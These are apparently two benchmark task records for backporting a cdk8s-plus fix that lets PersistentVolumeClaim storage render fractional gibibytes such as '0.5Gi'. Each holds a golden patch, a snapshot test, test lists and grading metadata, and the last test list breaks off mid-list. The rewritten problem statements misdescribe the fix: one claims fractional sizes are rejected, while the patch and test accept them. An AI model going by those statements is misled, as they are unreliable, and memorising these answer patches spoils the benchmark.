diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed (backport #5681) # Backport This will backport the following commits from `k8s-32/main` to `k8s-30/main`: - [fix(pvc): fractional gibibytes storage sizes are not allowed (#5681)](https://github.com/cdk8s-team/cdk8s-plus/pull/5681) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Prevent fractional gibibyte storage sizes in PersistentVolumeClaim specifications **Problem** Kubernetes PersistentVolumeClaims accept storage sizes only as whole gibibytes. The library previously allowed fractional Gi values, which results in invalid manifests being generated. **Root Cause** The size conversion routine rounded fractional values implicitly, silently producing non‑integer Gi strings. **Fix / Expected Behavior** - Storage size conversion now disables automatic rounding. - Attempting to specify a fractional Gi size triggers a validation error instead of producing an invalid manifest. - Only whole‑Gi sizes are accepted and emitted in the PVC definition. - Existing non‑fractional size handling remains unchanged. **Risk & Validation** - Verify that PVC manifests with whole‑Gi sizes continue to render correctly. - Add tests to confirm that fractional Gi inputs are rejected with an appropriate error. - Ensure no side‑effects on other constructs that rely on size conversion.
5,707
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaultChild", "can select namespaces", "can select all namespaces", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "Can be imported from secret 
name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for 
determinstic synthesis", "default medium", "memory medium", "size limit", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved 
twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "default configuration", "custom configuration", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - 
default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates 
HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be bounded to a volume at instantiation", "can be bounded to a volume post 
instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults 
if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "sidecar containers can have liveness probe", "sidecar containers can have readiness probe", "sidecar containers can have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an 
unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on 
pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
Method: Size.toGibibytes(options?: { rounding: SizeRoundingBehavior }) Location: `cdk8s.Size` class (imported from the `cdk8s` library). Inputs: Optional `options` object; currently supports a single key `rounding` whose value must be one of the `SizeRoundingBehavior` enum members (e.g., `SizeRoundingBehavior.NONE`). If omitted, the method falls back to the default rounding behavior. Outputs: Returns a `number` representing the size expressed in gibibytes (Gi). When `rounding: SizeRoundingBehavior.NONE` is supplied, the method returns a fractional value rather than rounding to the nearest whole Gi. Description: Converts a `Size` instance to its value in gibibytes. The new `options` argument allows callers to control rounding; using `NONE` permits fractional Gi values such as “0.5Gi”. Method: PersistentVolumeClaim.storage (getter) Location: `kplus.PersistentVolumeClaim` class (`src/pvc.ts`). Inputs: None (property accessor). Outputs: Returns a `Size | undefined` — the storage size that was supplied in the PVC props, or `undefined` if not set. Description: Exposes the requested storage size of a PersistentVolumeClaim as a `Size` object, enabling callers (including tests) to compare or reuse the value without re‑parsing the rendered manifest.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 1, "num_modified_lines": 4, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved", "backport" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/cdk8s-team/cdk8s-plus/pull/5681", "https://github.com/sorenlouv/backport" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue backports a fix that allows fractional GiB storage sizes for PVCs. The added test validates that a PVC created with 512 Mi results in a \"0.5Gi\" quantity in the manifest, and the golden patch modifies the conversion to use NONE rounding to preserve fractions. The test directly reflects the described fix and introduces no unrelated assertions, so it aligns with the requirements. 
No B‑category signals are present, making this a clear, solvable task.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c9ce02a18e16c1a98f43abc6a51b9ec9710949d7
2025-05-07 15:40:57
cdk8s-team__cdk8s-plus-5708
diff --git a/src/pvc.ts b/src/pvc.ts index 25c133ae..5c23eec2 100644 --- a/src/pvc.ts +++ b/src/pvc.ts @@ -1,4 +1,4 @@ -import { Size, ApiObject, Lazy } from 'cdk8s'; +import { Size, SizeRoundingBehavior, ApiObject, Lazy } from 'cdk8s'; import { Construct } from 'constructs'; import * as base from './base'; import * as k8s from './imports/k8s'; @@ -197,7 +197,9 @@ export class PersistentVolumeClaim extends base.Resource implements IPersistentV * @internal */ public _toKube(): k8s.PersistentVolumeClaimSpec { - const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes() + 'Gi') : undefined; + const storage = this.storage ? k8s.Quantity.fromString(this.storage.toGibibytes({ + rounding: SizeRoundingBehavior.NONE, + }) + 'Gi') : undefined; return { volumeName: this.volume ? this.volume.name : undefined, accessModes: this.accessModes?.map(a => a.toString()),
fix(pvc): fractional gibibytes storage sizes are not allowed (backport #5681) # Backport This will backport the following commits from `k8s-32/main` to `k8s-31/main`: - [fix(pvc): fractional gibibytes storage sizes are not allowed (#5681)](https://github.com/cdk8s-team/cdk8s-plus/pull/5681) <!--- Backport version: 9.5.1 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sorenlouv/backport)
**Title** Prevent unintended rounding of PVC storage sizes expressed in gibibytes **Problem** When a PersistentVolumeClaim specifies a size, the library automatically rounded the value to the nearest whole gibibyte. Kubernetes rejects PVC specifications that contain fractional gibibyte values, leading to silent creation of invalid manifests. **Root Cause** The size‑to‑Gi conversion used the default rounding behavior, which coerces fractional amounts into whole numbers without warning. **Fix / Expected Behavior** - Convert PVC storage sizes to gibibytes with explicit “no rounding” semantics. - Preserve the exact numeric value supplied by the user when forming the Kubernetes Quantity string. - Ensure that any fractional gibibyte size is either represented accurately or rejected by validation, rather than being silently altered. - Maintain existing functionality for whole‑number sizes. **Risk & Validation** - Verify that PVC manifests with integer gibibyte sizes remain unchanged. - Add tests confirming that fractional sizes are handled per the new rounding policy and do not produce invalid manifests. - Run the full suite to ensure no regressions in other storage‑related constructs.
5,708
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/pvc.test.ts.snap b/test/__snapshots__/pvc.test.ts.snap index 90a908d2..fe7599ca 100644 --- a/test/__snapshots__/pvc.test.ts.snap +++ b/test/__snapshots__/pvc.test.ts.snap @@ -100,3 +100,23 @@ Array [ }, ] `; + +exports[`small size 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "PersistentVolumeClaim", + "metadata": Object { + "name": "test-persistentvolumeclaim-c8af0974", + }, + "spec": Object { + "resources": Object { + "requests": Object { + "storage": "0.5Gi", + }, + }, + "volumeMode": "Filesystem", + }, + }, +] +`; diff --git a/test/pvc.test.ts b/test/pvc.test.ts index 3b1c1bec..e0619c7f 100644 --- a/test/pvc.test.ts +++ b/test/pvc.test.ts @@ -49,6 +49,19 @@ test('custom', () => { }); +test('small size', () => { + + const chart = cdk8s.Testing.chart(); + const pvc = new kplus.PersistentVolumeClaim(chart, 'PersistentVolumeClaim', { + storage: cdk8s.Size.mebibytes(512), + }); + + expect(pvc.storage).toEqual(cdk8s.Size.mebibytes(512)); + + const resources = cdk8s.Testing.synth(chart); + expect(resources).toMatchSnapshot(); +}); + test('can be imported', () => { const chart = Testing.chart();
[ "small size" ]
[ "default child", "defaults", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "fromCommand", "fromHttpGet", "fromTcpSocket", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "can grant permissions on imported", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "specify access from props", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "can be imported", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", 
"volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "Can mutate metadata", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", 
"default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "default configuration", "custom configuration", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", 
"Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "can set publishNotReadyAddresses", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add 
egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates 
HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "seccompProfile localhostProfile can not be used if type is not Localhost", "seccompProfile localhostProfile must only be set if type is Localhost", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new 
